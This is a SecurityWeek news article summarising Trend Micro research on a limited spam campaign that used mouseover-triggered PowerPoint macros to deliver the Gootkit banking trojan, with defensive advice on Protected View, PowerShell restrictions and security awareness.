Connect with us

Hi, what are you looking for?


Malware & Threats

Mouseover Macro Campaign Delivers Gootkit Trojan Via PowerPoint

Earlier this week, a researcher analyzed a newly detected technique for delivering malware involving PowerPoint files and mouseover events. Today, Trend Micro has published details on a spam campaign it detected in late May using the same technique.

Earlier this week, a researcher analyzed a newly detected technique for delivering malware involving PowerPoint files and mouseover events. Today, Trend Micro has published details on a spam campaign it detected in late May using the same technique.

TrendLabs researchers Rubio Wu and Marshall Chen suggest that although the recent campaign was limited (which in itself is not unusual as attackers try to avoid detection), it could be considered a dry run for future campaigns. The campaign was targeted particularly and organizations in the U.K., Poland, Netherlands, and Sweden. 

Similar to the earlier analysis, it used emails with a subject comprising a finance-related word followed by a number. “The pattern we saw,” notes the TrendLabs report “is ‘[fee] #__NUM__’, indicating that the operator, or the service provider that sends the spam email on behalf of the operator, are tracking the spam messages they send.”

The email is disguised as an invoice or purchase order and has a malicious PowerPoint Show file attached. This opens directly in presentation mode. The malicious macro will attempt to run as soon as the mouse is moved over the presentation; but is generally prevented by Microsoft’s Protected View until and unless the user ‘enables’ macros.

“Hence,” say the researchers, “a key ingredient in the infection chain is social engineering — luring the victim into opening the file and enabling the malware-laced content to run on the system.” The report does not elaborate on this, merely pointing out that, “A socially engineered email and mouse hover — and possibly a click if the latter is disabled — are all it would take to infect the victim.”

Once the macro runs, an embedded malicious PowerShell script is executed to download another downloader (JS_NEMUCOD.ELDSAUGH) in the form of a JScript Encoded File (JSE). It is this that retrieves the final payload from a command-and-control (C&C) server.

The payload detected by TrendLabs is a variant of the OTLARD banking Trojan, also known as Gootkit. This is well-known in Europe for stealing credentials and bank account information. TrendLabs suggests the detected campaign may be the precursor of wider use. “It wouldn’t be far-fetched for other malware like ransomware to follow suit,” say the researchers; “for instance, considering the notoriety of OTLARD/Gootkit’s operators for spreading other threats in their payloads, as well as ransomware’s history with using malware-laced Office documents.”

Advertisement. Scroll to continue reading.

This behavior is typical of the Gootkit operators: small campaigns focused on a limited number of countries — but with innovative and advanced operators. Earlier this year, the Gootkit malware evolved from web-injection to redirection which is a more difficult but potentially more successful way of deceiving users.

The danger inherent in this type of macro-based mouseover attack is that it can be entirely invisible to the victim. Ensuring that Microsoft’s Protected View is enforced will at least prevent the malicious macro from running automatically — but that will still require the user to be aware and to refuse to enable macros. Locking down and adopting best practices for using tools and services like PowerShell will also help.

The bottom-line, however, is that security awareness is the best defense against this new breed of macro-based attacks. “Given that social engineering is vital in these attacks,” say the researchers, “fostering a culture of cybersecurity among employees helps mitigate a weakness for which there is no silver bullet — the human psyche.”

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...